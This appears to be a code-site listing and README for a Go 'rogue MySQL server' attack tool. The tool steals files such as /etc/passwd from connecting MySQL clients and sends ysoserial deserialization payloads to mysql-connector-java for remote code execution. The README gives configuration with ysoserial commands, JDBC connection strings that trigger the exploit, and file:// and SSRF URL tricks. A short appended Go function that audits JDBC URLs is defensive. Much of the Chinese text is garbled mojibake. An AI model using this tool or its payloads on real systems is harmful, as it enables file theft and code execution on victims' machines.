rogue_mysql_server
Category: MySQL database
Development tool: Go
File size: 181KB
Downloads: 0
Upload date: 2022-12-02 06:32:26
Uploader: sh-1993
Description: A rogue MySQL server that supports reading files from most MySQL libraries of multiple programming languages.
File list:
LICENSE.txt (1062, 2022-12-02)
Makefile (122, 2022-12-02)
config.yaml (503, 2022-12-02)
go.mod (562, 2022-12-02)
go.sum (10245, 2022-12-02)
loot (0, 2022-12-02)
main.go (10490, 2022-12-02)
mysql (0, 2022-12-02)
mysql\auth_server.go (7922, 2022-12-02)
mysql\auth_server_none.go (1948, 2022-12-02)
mysql\auth_server_static.go (10744, 2022-12-02)
mysql\auth_server_static_test.go (9746, 2022-12-02)
mysql\binlog_event.go (10075, 2022-12-02)
mysql\binlog_event_common.go (11318, 2022-12-02)
mysql\binlog_event_common_test.go (12493, 2022-12-02)
mysql\binlog_event_json.go (16107, 2022-12-02)
mysql\binlog_event_json_test.go (6161, 2022-12-02)
mysql\binlog_event_make.go (14126, 2022-12-02)
mysql\binlog_event_make_test.go (11670, 2022-12-02)
mysql\binlog_event_mariadb.go (2606, 2022-12-02)
mysql\binlog_event_mariadb_test.go (12965, 2022-12-02)
mysql\binlog_event_mysql56.go (2917, 2022-12-02)
mysql\binlog_event_mysql56_test.go (5644, 2022-12-02)
mysql\binlog_event_rbr.go (39522, 2022-12-02)
mysql\binlog_event_rbr_test.go (20012, 2022-12-02)
mysql\binlog_event_test.go (1824, 2022-12-02)
mysql\charset.go (3195, 2022-12-02)
mysql\client.go (23620, 2022-12-02)
mysql\client_test.go (4442, 2022-12-02)
mysql\conn.go (37933, 2022-12-02)
mysql\conn_params.go (1986, 2022-12-02)
mysql\conn_test.go (9785, 2022-12-02)
... ...
# Rogue Mysql Server
[English README](https://github.com/rmb122/rogue_mysql_server/blob/master/./README_EN.md)
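A rogue MySQL server built on https://github.com/vitessio/vitess. It supports reading files from most MySQL client libraries across multiple languages, including go, php, python, java, and the native command-line client.
Libraries tested so far: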
| language | library | pass |
|----------|--------------------------------|------|
| go | github.com/go-sql-driver/mysql | ✔ |
| php | mysqli, pdo | ✔ |
| python | pymysql | ✔ |
| java | mysql-connector-java | ✔ |
| native | 10.4.13-MariaDB | ✔ |
觉—”¨– ”è…
## è
* …¤§ mysql ·
* è–è–
* 訖
* 蔨—, 鉷éè
* 薷 ConnAttr, 腷餖
* mysql-connector-java, ¨§é“…”¨—–èè RCE
## Usage
¨“‰”é…–¨‰, ·‰é…–è·èè
```sh
./rogue_mysql_server -generate
```
Run the server; by default it uses config.yaml:
```sh
./rogue_mysql_server
```
Or specify a different configuration file:
```sh
./rogue_mysql_server -config other_config.yaml
```
## Configuration
¤:
```yaml
host: 0.0.0.0
port: 3306
# IP address and port to listen on.
version_string: "10.4.13-MariaDB-log"
# Version string reported to the client.
file_list: ["/etc/passwd", "C:/boot.ini"]
save_path: ./loot
# éèè––, ¨è‘§è–—訉‰– (¤·°”觓).
# è·‰§èè, ‰…§—è¨éè––, ° `save_path` –¤.
always_read: true
# true, é·è°è·±” LOAD DATA LOCAL, é°èè––, ·è°è–, é…·è·±.
from_database_name: false
# true, °·è°“§°–èè––.
# é“ `jdbc:mysql://localhost:3306/%2fetc%2fhosts?allowLoadLocalInfile=true`.
# °·è– `/etc/hosts` èé `file_list` è.
max_file_size: 0
# è––¤§¤§° ( byte), è…è褧°–…°è. <= 0, 訉é.
auth: false
users:
- root: root
- root: password
# ”éè, `false`, éè“–è…è“…é.
# `true`, éè·é…éè·.
jdbc_exploit: false
always_exploit: false
ysoserial_command:
  cc4: ["java", "-jar", "ysoserial-0.0.6-SNAPSHOT-all.jar", "CommonsCollections4", 'touch /tmp/cc4']
  cc7: ["java", "-jar", "ysoserial-0.0.6-SNAPSHOT-all.jar", "CommonsCollections7", 'touch /tmp/cc7']
# è§ `jdbc ”¨…` è
```
## mysql-connector-java deserialization exploitation
This is fixed in versions >= 8.0.20 and >= 5.1.49; see the commits:
https://github.com/mysql/mysql-connector-j/commit/de7e1af306ffbb8118125a8659***f***ee5b35b1b
https://github.com/mysql/mysql-connector-j/commit/13f06c38fb68757607c460789196e3f7***d506f2
Configuration related to mysql-connector-java deserialization exploitation:
```yaml
jdbc_exploit: false
always_exploit: false
ysoserial_command:
  cc4: ["java", "-jar", "ysoserial-0.0.6-SNAPSHOT-all.jar", "CommonsCollections4", 'touch /tmp/cc4']
  cc7: ["java", "-jar", "ysoserial-0.0.6-SNAPSHOT-all.jar", "CommonsCollections7", 'touch /tmp/cc7']
```
`jdbc_exploit` è¨èè, ¨°· mysql-connector-j …訔¨. ”¨’è––è—é, ”¨è—è–·–.
`always_exploit` 訷 mysql-connector-java, ”¨.
`ysoserial_command` ”—– payload ‘¤.
”¨è `connectionAttributes` é‰éé蔨 payload, èé‰é豧. ¨è–豧 `t` ‰” payload. , é褔¨‰‰ payload .
, ”¨è°¤é…:
¨ 8.x ‰è”¨ cc7, è `jdbc:mysql://127.0.0.1:3306/test?connectionAttributes=t:cc7&autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=root&password=password`
¤–é訔 `com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor` ”¨–, èè¨:
| version | jdbc connection string |
|----------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 8.x | jdbc:mysql://127.0.0.1:3306/test?connectionAttributes=t:{payload_name}&autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=root&password=password |
| 6.x | jdbc:mysql://127.0.0.1:3306/test?connectionAttributes=t:{payload_name}&autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=root&password=password |
| >=5.1.11 | jdbc:mysql://127.0.0.1:3306/test?connectionAttributes=t:{payload_name}&autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=root&password=password |
When reading files, mysql-connector-java also accepts the `file://` scheme (and other schemes, such as http for SSRF). Besides setting `allowLoadLocalInfile` to true, this requires `allowUrlInLocalInfile` to be true; see [here](https://github.com/mysql/mysql-connector-j/blob/dd61577595edad45c3***af508cf91ad26fc4144f/src/main/protocol-impl/java/com/mysql/cj/protocol/a/NativeProtocol.java#L1877).
E.g.
* — `/` , `jdbc:mysql://127.0.0.1:3306/file%3A%2F%2F%2F?allowLoadLocalInfile=true&allowUrlInLocalInfile=true`
* SSRF `http://127.0.0.1:25565`, `jdbc:mysql://127.0.0.1:3306/http%3A%2F%2F127.0.0.1:25565?allowLoadLocalInfile=true&allowUrlInLocalInfile=true`
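A defensive check for the connection-string properties discussed above, as an added example that is not code from the rogue_mysql_server project: a Go function that audits `jdbc:mysql://` URLs in application configuration for the properties this README depends on. `AuditJDBCURL`, the `risky` table and the sample host names are hypothetical; property names are matched case-insensitively as a conservative assumption.

```go
package main

import (
	"fmt"
	"net/url"
	"sort"
	"strings"
)

// Connector/J URL properties named on this page, and why each matters with an untrusted server.
var risky = map[string]string{
	"allowloadlocalinfile":  "server can request client-side files (LOAD DATA LOCAL)",
	"allowurlinlocalinfile": "requested file names may be URLs such as file:// or http://",
	"autodeserialize":       "driver deserializes Java objects returned by the server",
}

// AuditJDBCURL (hypothetical helper) returns sorted findings for one jdbc:mysql URL.
func AuditJDBCURL(raw string) ([]string, error) {
	u, err := url.Parse(strings.TrimPrefix(raw, "jdbc:"))
	if err != nil || u.Scheme != "mysql" {
		return nil, fmt.Errorf("not a parsable jdbc:mysql URL: %q", raw)
	}
	var out []string
	for key, vals := range u.Query() {
		k, v := strings.ToLower(key), strings.Join(vals, ",")
		if why, ok := risky[k]; ok && strings.EqualFold(v, "true") {
			out = append(out, key+"=true: "+why)
		}
		if strings.HasSuffix(k, "interceptors") && strings.Contains(v, "ServerStatusDiffInterceptor") {
			out = append(out, key+": ServerStatusDiffInterceptor reads server-returned rows")
		}
	}
	// url.Parse percent-decodes the path, exposing a path or URL hidden in the database segment.
	if db := strings.TrimPrefix(u.Path, "/"); strings.Contains(db, "/") {
		out = append(out, "database name decodes to a path or URL: "+db)
	}
	sort.Strings(out)
	return out, nil
}

func main() {
	// Constructed inputs: the first reuses a URL shape shown on this page.
	for _, s := range []string{
		"jdbc:mysql://127.0.0.1:3306/file%3A%2F%2F%2F?allowLoadLocalInfile=true&allowUrlInLocalInfile=true",
		"jdbc:mysql://db.internal.example:3306/app?useSSL=true",
	} {
		fmt.Println(AuditJDBCURL(s))
	}
}
```

Any finding on a connection string whose host or parameters can be influenced by user input is worth treating as a review blocker.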
## Ref
mysql-connector-java Ӭ:
https://github.com/fnmsd/MySQL_Fake_Server
mysql è…:
https://github.com/mysql/mysql-connector-j
https://github.com/vitessio/vitess
https://github.com/src-d/go-mysql-server
http://scz.617.cn:8/network/202001101612.txt